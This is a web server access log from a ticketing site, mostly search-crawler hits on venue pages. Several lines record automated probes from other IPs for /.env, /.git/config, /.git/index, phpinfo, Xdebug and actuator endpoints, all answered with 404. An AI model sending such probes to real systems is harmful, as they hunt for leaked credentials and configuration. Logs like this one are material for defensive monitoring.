66.249.74.6 - - [13/Feb/2025:13:50:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=AE789D77-DA16-B130-0CBE-FA563F4A0E8A HTTP/1.1" 200 93013
72.46.130.218 - - [13/Feb/2025:13:52:58 +0100] "GET /ticket2/opencms/admin/modules/framework/amp_conf/htdocs/admin/config.php HTTP/1.1" 404 -
66.249.74.8 - - [13/Feb/2025:13:54:09 +0100] "GET /ticket2/opencms/en/venue/?countryid=4F919533-4A01-8CFD-B333-C95FA433589C HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:13:54:18 +0100] "GET /ticket2/opencms/en/venue/?countryid=E687CC57-02FA-AF76-268E-C1A53D569993 HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:13:55:35 +0100] "GET /ticket2/opencms/en/venue/?countryid=D89C1642-F4D3-8098-A250-FAF55037EC33 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:13:56:16 +0100] "GET /ticket2/opencms/en/venue/?countryid=7181F1B1-BB62-9D43-5EFA-B07E8505C9FD HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:13:56:26 +0100] "GET /ticket2/opencms/en/venue/?countryid=E7736334-EC5F-4E42-8871-FF5303C85500 HTTP/1.1" 200 93713
66.249.74.6 - - [13/Feb/2025:13:58:27 +0100] "GET /ticket2/opencms/en/venue/?countryid=9ACB31BA-4730-8A49-6A26-C927F023CAB9 HTTP/1.1" 200 93013
45.144.212.139 - - [13/Feb/2025:14:08:39 +0100] "GET /ticket2/opencms/.git/config HTTP/1.1" 404 -
80.82.77.202 - - [13/Feb/2025:14:10:19 +0100] "GET / HTTP/1.0" 404 -
80.82.77.202 - - [13/Feb/2025:14:10:34 +0100] "???7??V\?gH92UH??R??Z??$???#????? d??v??L?[@ ??? " 400 -
80.82.77.202 - - [13/Feb/2025:14:10:34 +0100] "GET /aaa9 HTTP/1.1" 404 -
80.82.77.202 - - [13/Feb/2025:14:10:34 +0100] "??W??fN???t?? *?sUK???? ]>K?I[?R|???????@???eQ?X????&?+?/?,?0????? ??" 400 -
198.235.24.183 - - [13/Feb/2025:19:45:46 +0100] "?????wJ?,????v??P}??n`?Y[?e??h???/?+?0?,???'?#?? ?(?$?? " 400 -
185.180.140.101 - - [13/Feb/2025:20:08:11 +0100] "GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1" 404 -
92.255.57.58 - - [13/Feb/2025:20:16:04 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 -
66.249.74.6 - - [13/Feb/2025:20:18:19 +0100] "GET /ticket2/opencms/en/buy_safety/ HTTP/1.1" 200 64296
66.249.74.7 - - [13/Feb/2025:20:20:42 +0100] "GET /ticket2/opencms/en/venue/?countryid=A07C6930-60EB-29AC-3FDB-C97CE816C6C1 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:20:20:43 +0100] "GET /ticket2/opencms/en/venue/?countryid=91AAC8CB-DC00-AD46-25B5-9E567AEBD805 HTTP/1.1" 200 93483
66.249.74.7 - - [13/Feb/2025:20:21:10 +0100] "GET /ticket2/opencms/en/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=36394212-F82E-F845-399B-42BED55969CC HTTP/1.1" 200 73811
66.249.74.7 - - [13/Feb/2025:20:23:47 +0100] "GET /ticket2/opencms/en/venue/?countryid=8AB3059A-CDC7-3AC2-BF58-176BA47DA764 HTTP/1.1" 200 108442
66.249.74.8 - - [13/Feb/2025:20:26:30 +0100] "GET /ticket2/opencms/en/venue/?countryid=E8C1CB18-01B3-A5D8-BA63-2D05631C3548 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:20:27:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=86D8F5F1-1C66-F61F-D1EA-1BF1C36E41D6 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:20:28:26 +0100] "GET /ticket2/opencms/en/venue/?countryid=C390DA46-FDFE-72E8-463E-D2A88C688BC4 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:20:28:36 +0100] "GET /ticket2/opencms/en/venue/?countryid=86F93FF6-B3C2-4693-7679-0BD214A3D804 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:20:31:18 +0100] "GET /ticket2/opencms/en/venue/?countryid=01A4931A-C165-4B79-C9B2-6B15C1A8EA59 HTTP/1.1" 200 95592
92.255.57.58 - - [13/Feb/2025:20:32:03 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 -
66.249.74.6 - - [13/Feb/2025:20:32:35 +0100] "GET /ticket2/opencms/en/venue/?countryid=7955C1DA-0203-9687-2994-14739AEE539F HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:20:37:08 +0100] "GET /ticket2/opencms/en/venue/?countryid=180EAAAB-918A-9F1E-ED78-EB81C803FB9F HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:20:37:34 +0100] "GET /ticket2/opencms/en/venue/?countryid=666C887D-F998-338F-2ABE-16022B884D9D HTTP/1.1" 200 93013
195.246.120.122 - - [13/Feb/2025:20:37:51 +0100] "GET / HTTP/1.0" 404 -
66.249.74.8 - - [13/Feb/2025:20:42:19 +0100] "GET /ticket2/opencms/en/venue/?countryid=E317C19B-53AA-3539-EAD3-8DD7161AE012 HTTP/1.1" 200 93922
66.249.74.7 - - [13/Feb/2025:20:42:20 +0100] "GET /ticket2/opencms/en/venue/?countryid=A95940B8-9D24-555E-8502-7702CF57B799 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:20:42:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=DBAF1CDD-BB02-B386-3F1A-E606C2F733BC HTTP/1.1" 200 94785
114.119.153.152 - - [13/Feb/2025:20:43:37 +0100] "GET /ticket2/opencms/en/buy/?comcatid=66708183-7480-3365-06BF-DBF60280AB45&catid=8C381435-A1E8-94AF-2C58-D133FCA44A31 HTTP/1.1" 200 65987
66.249.74.6 - - [13/Feb/2025:20:47:27 +0100] "GET /ticket2/opencms/en/venue/?countryid=40378634-F839-FEF7-110F-40EAA530AB1D HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:20:49:41 +0100] "GET /ticket2/opencms/en/venue/?countryid=EBEF9B75-B33B-BBAE-FE14-1F037092B34B HTTP/1.1" 200 102918
66.249.74.8 - - [13/Feb/2025:20:51:25 +0100] "GET /ticket2/opencms/en/venue/?countryid=99879305-CFA6-190E-0159-90B37D9BF760 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:20:51:26 +0100] "GET /ticket2/opencms/en/venue/?countryid=7B8EA247-B72D-57A1-F5B5-112514CAAC1F HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:20:52:20 +0100] "GET /ticket2/opencms/en/venue/?countryid=90EF2598-A82F-6143-0333-A0B49749F64C HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:21:00:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=13702050-2F05-4DBF-E863-0547221CB311 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:21:03:48 +0100] "GET /ticket2/opencms/en/venue/?countryid=397EE7D1-C7FC-902D-F9A7-02173E5367FD HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:21:04:43 +0100] "GET /ticket2/opencms/en/venue/?countryid=160EC1E3-9CD9-D675-7FCF-474C7815EC7B HTTP/1.1" 200 104115
66.249.74.6 - - [13/Feb/2025:21:05:38 +0100] "GET /ticket2/opencms/en/venue/?countryid=6941D863-6987-AFB6-0EB8-DD9A02005855 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:21:06:30 +0100] "GET /ticket2/opencms/en/venue/?countryid=6D97DD41-58F8-E86C-8D49-519899AAF206 HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:21:07:37 +0100] "GET /ticket2/opencms/en/venue/?countryid=2193F5F2-8798-B3BE-FB16-3B568A67DED7 HTTP/1.1" 200 93013
206.189.41.244 - - [13/Feb/2025:21:10:36 +0100] "GET /ticket2/opencms/.env HTTP/1.1" 404 -
66.249.74.8 - - [13/Feb/2025:21:12:26 +0100] "GET /ticket2/opencms/en/venue/?countryid=52F4A5D1-57D1-3DCD-E1E5-1C5778B3C28E HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:21:13:29 +0100] "GET /ticket2/opencms/en/venue/?countryid=D1CF94F0-7D29-9934-B390-888966FEE978 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:21:14:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=3F84C922-E52E-4F0E-1F8F-97D62941C628 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:21:15:42 +0100] "GET /ticket2/opencms/en/venue/?countryid=B33351B8-DB63-1834-566A-CB44E5291395 HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:21:17:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=C3419397-8D1B-9427-953E-96370A3C8B07 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:21:18:20 +0100] "GET /ticket2/opencms/en/venue/?countryid=577F4BE1-D660-BA06-FD83-D505059D70AB HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:21:19:38 +0100] "GET /ticket2/opencms/en/venue/?countryid=E51F1885-F514-FB3D-D1AC-60D5859EEBD8 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:21:20:08 +0100] "GET /ticket2/opencms/en/venue/?countryid=4007957B-6F0C-502F-B270-CD7A61AC3C71 HTTP/1.1" 200 93013
103.139.219.180 - - [13/Feb/2025:21:24:34 +0100] "GET / HTTP/1.1" 404 -
66.249.74.8 - - [13/Feb/2025:21:24:35 +0100] "GET /ticket2/opencms/en/venue/?countryid=C4D16A7F-3F94-CF6E-7376-231BD32DC9BF HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:21:26:18 +0100] "GET /ticket2/opencms/en/venue/?countryid=36C09A59-C496-27BE-0FFA-E2D18F46452F HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:21:27:25 +0100] "GET /ticket2/opencms/en/venue/?countryid=B2685E9F-F5FB-C584-F982-0FC8E094C1AC HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:21:28:46 +0100] "GET /ticket2/opencms/en/venue/?countryid=3074CB3F-D378-D1B1-5E17-3ED6547AC5E1 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:21:28:48 +0100] "GET /ticket2/opencms/en/venue/?countryid=65FCED9C-5C2E-43C2-63C9-AA64AA056E6E HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:21:33:20 +0100] "GET /ticket2/opencms/en/venue/?countryid=87A625FD-F8B4-E412-121A-2F51AA59B0DD HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:21:33:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=925A6494-6F30-A898-105B-2B0AB62464E2 HTTP/1.1" 200 93013
193.68.89.10 - - [13/Feb/2025:21:35:18 +0100] "GET / HTTP/1.1" 404 -
193.68.89.51 - - [13/Feb/2025:21:39:35 +0100] "GET / HTTP/1.1" 404 -
66.249.74.8 - - [13/Feb/2025:21:40:48 +0100] "GET /ticket2/opencms/en/venue/?countryid=23D31018-1DE6-5792-AB05-50B75604BF40 HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:21:41:20 +0100] "GET /ticket2/opencms/en/venue/?countryid=2F10777F-9907-2201-7AD1-ACB3606C47A4 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:21:41:44 +0100] "GET /ticket2/opencms/en/venue/?countryid=8858D171-8914-8DFD-A2E4-50FE56A44627 HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:21:43:17 +0100] "GET /ticket2/opencms/en/venue/?countryid=668D17D3-DDBF-7460-C2FB-E48A99F3BD87 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:21:43:20 +0100] "GET /ticket2/opencms/en/venue/?countryid=4B450FD2-0462-34B9-7186-638797EC0F09 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:21:43:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=EFE62657-ED88-7045-031D-E16EFB5F4910 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:21:43:32 +0100] "GET /ticket2/opencms/en/venue/?countryid=EFCDD4BE-2B2E-DD3B-EFFB-83BD42354573 HTTP/1.1" 200 103082
66.249.74.6 - - [13/Feb/2025:21:47:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=278F1901-B821-DEE9-D6D6-BF49B756C52A HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:21:50:20 +0100] "GET /ticket2/opencms/en/venue/?countryid=8F4397BE-7412-47F2-178D-719E5255923A HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:21:50:29 +0100] "GET /ticket2/opencms/en/venue/?countryid=9554F04E-60EE-4D4B-3CE3-7EC55ADC4B4E HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:21:55:27 +0100] "GET /ticket2/opencms/en/venue/?countryid=01A4931A-C165-4B79-C9B2-6B15C1A8EA57 HTTP/1.1" 200 121474
66.249.74.7 - - [13/Feb/2025:21:55:44 +0100] "GET /ticket2/opencms/en/venue/?countryid=5EEFCF47-AD38-F951-EE2B-C85C4E24342F HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:21:55:45 +0100] "GET /ticket2/opencms/en/venue/?countryid=1D29B349-241A-DA25-C29E-C6C960274511 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:21:56:42 +0100] "GET /ticket2/opencms/en/venue/?countryid=39338EA9-6CB0-428E-D26D-7F5D8BBADF63 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:21:59:27 +0100] "GET /ticket2/opencms/en/venue/?countryid=203E9A91-CAB8-9987-28BB-AF31071CCCA1 HTTP/1.1" 200 94408
66.249.74.6 - - [13/Feb/2025:21:59:35 +0100] "GET /ticket2/opencms/en/venue/?countryid=87A0CCAA-3D1F-51AB-962B-6BBE856D2C40 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:22:00:17 +0100] "GET /ticket2/opencms/en/venue/?countryid=D9E13DB9-8338-AA2E-D2F0-97CDF9CA1F76 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:22:01:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=22C9ACC4-BEB7-DB26-7DA3-281C548BB009 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:22:02:45 +0100] "GET /ticket2/opencms/en/venue/?countryid=E0555A68-26A1-67E7-1128-6849A8576005 HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:22:04:47 +0100] "GET /ticket2/opencms/en/venue/?countryid=40FD0827-8E8D-58A2-3FF2-3253A033E8A7 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:22:05:20 +0100] "GET /ticket2/opencms/en/venue/?countryid=ACBCEDDC-478F-6F5C-046F-A1A55C83F98D HTTP/1.1" 200 99186
66.249.74.6 - - [13/Feb/2025:22:05:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=893226B0-D69E-4766-831E-1D42E613AB75 HTTP/1.1" 200 93255
66.249.74.7 - - [13/Feb/2025:22:05:37 +0100] "GET /ticket2/opencms/en/venue/?countryid=6994D0E6-4880-D162-87F9-DDDE5D63EE86 HTTP/1.1" 200 104896
66.249.74.8 - - [13/Feb/2025:22:06:43 +0100] "GET /ticket2/opencms/en/venue/?countryid=E1B3F038-2C75-F5F0-10E7-1C4055EF4908 HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:22:07:30 +0100] "GET /ticket2/opencms/en/venue/?countryid=C83BD7D3-147E-EEE7-3AB4-19E8D9E56196 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:22:07:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=733736B0-BB51-71CE-21FF-5220C9ACD245 HTTP/1.1" 200 93704
66.249.74.6 - - [13/Feb/2025:22:08:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=63BA787B-924D-97B6-EDC4-126C78A77B7D HTTP/1.1" 200 95888
66.249.74.6 - - [13/Feb/2025:22:08:30 +0100] "GET /ticket2/opencms/en/venue/?countryid=41062D18-DA6E-3D10-CF2B-6CACED69017C HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:22:09:17 +0100] "GET /ticket2/opencms/en/venue/?countryid=C0984F56-34B3-2410-35BD-6A54606EFEFB HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:22:09:28 +0100] "GET /ticket2/opencms/en/venue/?countryid=1D2AF5BD-A881-D22D-AE7C-E22D0AA83910 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:22:09:35 +0100] "GET /ticket2/opencms/en/login/ HTTP/1.1" 200 65723
66.249.74.7 - - [13/Feb/2025:22:10:27 +0100] "GET /ticket2/opencms/en/venue/?countryid=38CC08E3-88E5-726B-7780-E55017C79604 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:22:11:07 +0100] "GET /ticket2/opencms/en/venue/?countryid=DC26E1B3-EC21-D762-3AB1-2969BD57FF68 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:22:11:08 +0100] "GET /ticket2/opencms/en/venue/?countryid=A9198A40-C385-3F3F-F1E3-C36DF8CBA8BE HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:22:12:19 +0100] "GET /ticket2/opencms/en/venue/?countryid=846E9CDC-CA28-ECDF-BD87-BAB8F25C08E3 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:22:13:29 +0100] "GET /ticket2/opencms/en/venue/?countryid=73397994-CBFD-79C6-593A-A865ED272E64 HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:22:13:30 +0100] "GET /ticket2/opencms/en/venue/?countryid=542AAA85-729E-385B-AA25-7388FBEAC6A1 HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:22:14:44 +0100] "GET /ticket2/opencms/en/venue/?countryid=15679D6D-1531-2ADE-1A00-1D43A92EB55E HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:22:17:44 +0100] "GET /ticket2/opencms/en/venue/?countryid=55B682DB-9731-DD7B-33FA-C9B465971014 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:22:19:41 +0100] "GET /ticket2/opencms/en/venue/?countryid=A2F220AE-4AF1-2377-6B91-A90A18E35FA2 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:22:22:45 +0100] "GET /ticket2/opencms/en/venue/?countryid=A120839E-3691-C1CC-A7E6-AFA581C3B971 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:22:23:29 +0100] "GET /ticket2/opencms/en/venue/?countryid=869CA27A-97A1-03D4-5D03-7E27F7DE8DED HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:22:23:30 +0100] "GET /ticket2/opencms/en/venue/?countryid=EBCAD492-44DD-BA3B-65FF-004FBE418FEE HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:22:31:42 +0100] "GET /ticket2/opencms/en/venue/?countryid=52C47DB4-FAB4-2851-C1B4-C8688282983C HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:22:33:17 +0100] "GET /ticket2/opencms/en/venue/?countryid=D9C90621-DB02-1B5C-863E-8CD5BDDB79A4 HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:22:35:26 +0100] "GET /ticket2/opencms/en/venue/?countryid=9F976644-D811-1E5C-8CA5-C3CE6B3B71EB HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:22:35:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=FA8BEB57-7287-7F81-B4E1-A4D5981068EB HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:22:35:45 +0100] "GET /ticket2/opencms/en/venue/?countryid=107D8800-8603-0BDA-4FD0-61E1109B7E82 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:22:35:46 +0100] "GET /ticket2/opencms/en/venue/?countryid=08F91625-8D0D-C389-E632-ABC46886787C HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:22:38:22 +0100] "GET /ticket2/opencms/en/venue/?countryid=D2CF2CB4-9396-305E-92AF-B785C8723E40 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:22:39:38 +0100] "GET /ticket2/opencms/en/venue/?countryid=F4546A23-438C-B8AA-E6C1-C86A24730617 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:22:39:41 +0100] "GET /ticket2/opencms/en/venue/?countryid=B8EC120B-4F43-C769-CF6D-BEF2F141BF54 HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:22:41:39 +0100] "GET /ticket2/opencms/en/venue/?countryid=F73B31CF-DEFB-FC53-7E40-B21973CC0497 HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:22:43:30 +0100] "GET /ticket2/opencms/en/venue/?countryid=13E2F7E1-5D94-F02B-9C0C-560B8034AC6C HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:22:44:37 +0100] "GET /ticket2/opencms/en/venue/?countryid=6E625517-1E9A-024B-7EBB-F569FEDEE88E HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:22:46:34 +0100] "GET /ticket2/opencms/en/venue/?countryid=12E3BEDF-CE35-CC7F-2705-A98A37B9636B HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:22:48:07 +0100] "GET /ticket2/opencms/en/venue/?countryid=219973C9-2DDA-2E70-1B9F-7B4A1AF9BB6C HTTP/1.1" 200 93013
196.251.72.73 - - [13/Feb/2025:22:51:14 +0100] "GET /ticket2/opencms/_profiler/phpinfo HTTP/1.1" 404 -
205.210.31.82 - - [13/Feb/2025:22:52:16 +0100] "GET / HTTP/1.0" 404 -
196.251.72.73 - - [13/Feb/2025:22:54:33 +0100] "GET /ticket2/opencms/_profiler/phpinfo HTTP/1.1" 404 -
66.249.74.7 - - [13/Feb/2025:22:55:22 +0100] "GET /ticket2/opencms/en/venue/?countryid=DBF1B903-D9ED-502A-C58E-CF837DE83CCB HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:22:55:46 +0100] "GET /ticket2/opencms/en/venue/?countryid=AAA022C2-26E4-B95A-575B-2EC278F7A0C0 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:22:57:39 +0100] "GET /ticket2/opencms/en/venue/?countryid=E3A24EE3-33A9-9FC0-BC5A-AFB379A75340 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:22:57:47 +0100] "GET /ticket2/opencms/en/venue/?countryid=45F5A414-7E6A-581D-803C-BE75F86B0965 HTTP/1.1" 200 93013
114.119.141.178 - - [13/Feb/2025:22:59:04 +0100] "GET /ticket2/opencms/en/venue/?venueid=5A7F3216-3247-9899-48F9-7CCF4571FF29 HTTP/1.1" 200 63630
114.119.143.233 - - [13/Feb/2025:23:00:56 +0100] "GET /ticket2/opencms/en/buy/?comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=8B6802AF-1ADE-4BE1-A1F7-7671190CFB4F HTTP/1.1" 200 68923
66.249.74.7 - - [13/Feb/2025:23:02:44 +0100] "GET /ticket2/opencms/en/venue/?countryid=154B818B-780A-C47E-AFFC-04B53C9B2BA9 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:23:05:20 +0100] "GET /ticket2/opencms/en/venue/?countryid=A4DD8A66-89A9-9256-5B01-F5C6EA7FFD86 HTTP/1.1" 200 93700
66.249.74.6 - - [13/Feb/2025:23:05:36 +0100] "GET /ticket2/opencms/en/venue/?countryid=08DE8999-72B5-1ADD-5E76-2A7D1399FECF HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:23:06:18 +0100] "GET /ticket2/opencms/en/venue/?countryid=02784C54-6C5E-C56A-BCB8-106172A4270F HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:23:06:30 +0100] "GET /ticket2/opencms/en/venue/?countryid=E4BF4299-AF7E-C1CD-3B3B-2AB4B9697C56 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:23:06:32 +0100] "GET /ticket2/opencms/en/venue/?countryid=4067501C-3738-9610-03B0-18FCE6867011 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:23:06:33 +0100] "GET /ticket2/opencms/en/selling_tickets/ HTTP/1.1" 200 64298
66.249.74.7 - - [13/Feb/2025:23:06:34 +0100] "GET /ticket2/opencms/en/venue/?countryid=CB0D79A8-EF67-3E1D-EAA5-706F775F6058 HTTP/1.1" 200 110244
66.249.74.6 - - [13/Feb/2025:23:06:41 +0100] "GET /ticket2/opencms/en/venue/?countryid=8C4D64C3-0D1D-4A9C-0C13-7146340D3209 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:23:07:17 +0100] "GET /ticket2/opencms/en/venue/?countryid=1A4DC6D7-7BCB-9C80-4A3B-99ABDC610C14 HTTP/1.1" 200 93236
66.249.74.6 - - [13/Feb/2025:23:07:20 +0100] "GET /ticket2/opencms/en/venue/?countryid=B5C0CC6D-2D05-4091-BA03-82DFEB13498E HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:23:07:25 +0100] "GET /ticket2/opencms/en/venue/?countryid=A758EE03-9751-87FA-5392-033D41724B17 HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:23:08:44 +0100] "GET /ticket2/opencms/en/venue/?countryid=01A4931A-C165-4B79-C9B2-6B15C1A8EA58 HTTP/1.1" 200 155078
66.249.74.7 - - [13/Feb/2025:23:10:18 +0100] "GET /ticket2/opencms/en/venue/?countryid=9D09DC7F-C38B-5D28-4040-9F250F6A5B12 HTTP/1.1" 200 93236
66.249.74.8 - - [13/Feb/2025:23:10:20 +0100] "GET /ticket2/opencms/en/venue/?countryid=77890CE6-5E73-6D4E-9314-C2148221142A HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:23:10:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=4A875ED5-B8D7-E466-F219-8D4E7C0DC39C HTTP/1.1" 200 94130
66.249.74.7 - - [13/Feb/2025:23:14:29 +0100] "GET /ticket2/opencms/en/venue/?countryid=89A5E86C-3AC3-3EDB-6F03-E6FC6A513BA2 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:23:14:43 +0100] "GET /ticket2/opencms/en/venue/?countryid=2FA5524A-D842-525C-9D6C-F790BA0272FC HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:23:14:44 +0100] "GET /ticket2/opencms/en/venue/?countryid=947940C4-79F7-1AE9-A4BA-06096E0B9585 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:23:17:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=17043DCB-6068-95EE-BD77-FB6EADBB798A HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:23:20:37 +0100] "GET /ticket2/opencms/en/venue/?countryid=A3B02FE6-E314-D205-EF34-B3751539C7A7 HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:23:21:34 +0100] "GET /ticket2/opencms/en/venue/?countryid=656DB01E-8560-3560-F23F-27BC90E7C03C HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:23:22:34 +0100] "GET /ticket2/opencms/en/venue/?countryid=0A131296-8532-77F1-DA6B-5BEC9CE9B834 HTTP/1.1" 200 93013
52.167.144.203 - - [13/Feb/2025:23:22:36 +0100] "GET /ticket2/opencms/sv/buying_tickets/ HTTP/1.1" 200 66595
66.249.74.7 - - [13/Feb/2025:23:22:42 +0100] "GET /ticket2/opencms/en/venue/?countryid=5F186EB9-FC66-3D17-58C4-6A160CA3B9D1 HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:23:23:41 +0100] "GET /ticket2/opencms/en/venue/?countryid=6DB0834B-E25F-449A-5515-025982E4CF10 HTTP/1.1" 200 93013
66.249.74.7 - - [13/Feb/2025:23:24:05 +0100] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
66.249.74.6 - - [13/Feb/2025:23:24:36 +0100] "GET /ticket2/opencms/en/venue/?countryid=FECEDBB4-CBB7-37BC-56A2-3BCE3EF7E1E8 HTTP/1.1" 200 95572
45.144.212.139 - - [13/Feb/2025:23:25:02 +0100] "GET /ticket2/opencms/.git/index HTTP/1.1" 404 -
34.34.146.182 - - [13/Feb/2025:23:28:05 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
66.249.74.6 - - [13/Feb/2025:23:29:18 +0100] "GET /ticket2/opencms/en/faq/ HTTP/1.1" 200 66347
66.249.74.6 - - [13/Feb/2025:23:29:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=CEE00D6A-FB56-5500-E375-BA915009094D HTTP/1.1" 200 93013
66.249.74.8 - - [13/Feb/2025:23:30:29 +0100] "GET /ticket2/opencms/en/venue/?countryid=FE820485-92B2-CBF2-B829-80FB72DDC46F HTTP/1.1" 200 93013
66.249.74.6 - - [13/Feb/2025:23:31:46 +0100] "GET /ticket2/opencms/en/venue/?countryid=6A07F71C-E21A-1DB2-608E-7A1B9B76A929 HTTP/1.1" 200 93013
